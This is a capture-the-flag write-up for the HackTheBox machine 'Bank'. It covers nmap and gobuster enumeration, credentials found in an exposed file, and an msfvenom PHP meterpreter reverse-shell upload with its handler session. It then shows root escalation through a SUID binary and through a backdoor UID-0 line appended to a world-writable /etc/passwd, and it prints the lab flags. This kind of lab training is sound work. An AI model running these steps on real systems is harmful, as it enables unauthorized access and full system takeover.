Post

HackTheBox Bank

Writeup for HackTheBox Bank

Posted Updated
By Edwin Tok
3 min read
HackTheBox Bank

Machine Synopsis

Bank is a relatively simple machine, however proper web enumeration is key to finding the necessary data for entry. (Source)

Enumeration

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

$ nmap -sC -sV -A 10.10.10.29

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA)
|   2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA)
|   256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA)
|_  256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519)
53/tcp open  domain  ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)
| dns-nsid:
|_  bind.version: 9.9.5-3ubuntu0.14-Ubuntu
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

Website

c518677787c99cdbaf00ae5364e2671b.png Seems like we need to add the hostname to our /etc/hosts/ file

1
2
3
4
5
6
7
8
9

$ cat /etc/hosts
127.0.0.1	localhost
127.0.1.1	Shiro.Blank	Shiro
10.10.10.29	bank.htb

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

Now, we should be able to view the website.

Login.png

Let’s run gobuster to brute force the possible URLs in the website (use flag -x php because the website is running php).

1
2
3
4
5
6
7
8
9
10
11
12

$ gobuster dir --url http://bank.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -t 50
...
/support.php (Status: 302)
/uploads (Status: 301)
/assets (Status: 301)
/logout.php (Status: 302)
/login.php (Status: 200)
/index.php (Status: 302)
/inc (Status: 301)
/server-status (Status: 403)
/balance-transfer (Status: 301)
...

Lets visit the /balance-transfer/ page and sort it by size. BalanceTransfer.png

Notice that there is one file that has a smaller size compared to others

InterestingFile.png

We can login to the webapp using the credentials found.

Dashboard.png

Dashboard_2.png

Inspecting the page source shows that we should use .htb extensions

PageSource.png

Exploitation

Generate a reverse php shell with .htb extension using msfvenom.

1

$ msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.14.2 LPORT=1234 -f raw > exploit.htb

Then upload the file to the website, start msfconsole and then execute the PHP file.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST tun0
LHOST => tun0
msf6 exploit(multi/handler) > set LPORT 1234
LPORT => 1234
msf6 exploit(multi/handler) > set AUTORUNSCRIPT post/windows/manage/migrate
AUTORUNSCRIPT => post/windows/manage/migrate
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
...
[*] Meterpreter session 1 opened (10.10.14.2:1234 -> 10.10.10.29:35630) at 2021-05-29 14:54:01 +0800

meterpreter > shell
Process 1512 created.
Channel 0 created.
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")' # https://netsec.ws/?p=337
www-data@bank:/var/www/bank/uploads$

Privilege Escalation

Lets search for all SUID binaries owned by root.

  • search all subdirectories of / (the entire file system)
  • type f - only return files
  • user root - only return files owned by root
  • perm -4000 - files with SUID bit set
  • 2>/dev/null - don’t show errors
1
2
3
4
5
6

www-data@bank:/var/www/bank/uploads$ find / -type f -user root -perm -4000 2>/dev/null
</uploads$ find / -type f -user root -perm -4000 2>/dev/null
/var/htb/bin/emergency
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
...

We found an interesting /var/htb/bin/emergency so lets try to run it

1
2
3
4
5
6
7
8

www-data@bank:/var/www/bank/uploads$ /var/htb/bin/emergency
#
# whoami
root
# cat /home/chris/user.txt
c81ee9df3751ccf82b64af3046a3269a
# cat /root/root.txt
e92b13e6ff0dd9361add88e07b6687c9

Alternative Privilege Escalation

Another way of getting root is to exploit the writeable passwd folder.

1
2
3
4

# ls -l /etc/passwd /etc/shadow 				Note that -1 will generate a MD5 password, -5 a SHA256 and -6 SHA512
ls -l /etc/passwd /etc/shadow
-rw-rw-rw- 1 root root   1252 May 28  2017 /etc/passwd
-rw-r----- 1 root shadow  895 Jun 14  2017 /etc/shadow

Then, generate a password hash for the password “shiro” using openssl

1
2
3

# openssl passwd -1 shiro
openssl passwd -1 shiro
$1$pOJIRjNf$gJAUfsAmmuY1XUuud4ink/

Then add a line to /etc/passwd using echo in this format

  • username:password:userid:groupid:comment:homedirectory:shell
1
2
3
4
5
6
7

# echo 'shiro:$1$pOJIRjNf$gJAUfsAmmuY1XUuud4ink/:0:0:pwned:/root:/bin/bash' >> /etc/passwd
echo 'shiro:$1$pOJIRjNf$gJAUfsAmmuY1XUuud4ink/:0:0:pwned:/root:/bin/bash' >> /etc/passwd
# su - shiro
su - shiro
Password: shiro

root@bank:~#
HackTheBox
linux
This post is licensed under CC BY 4.0 by the author.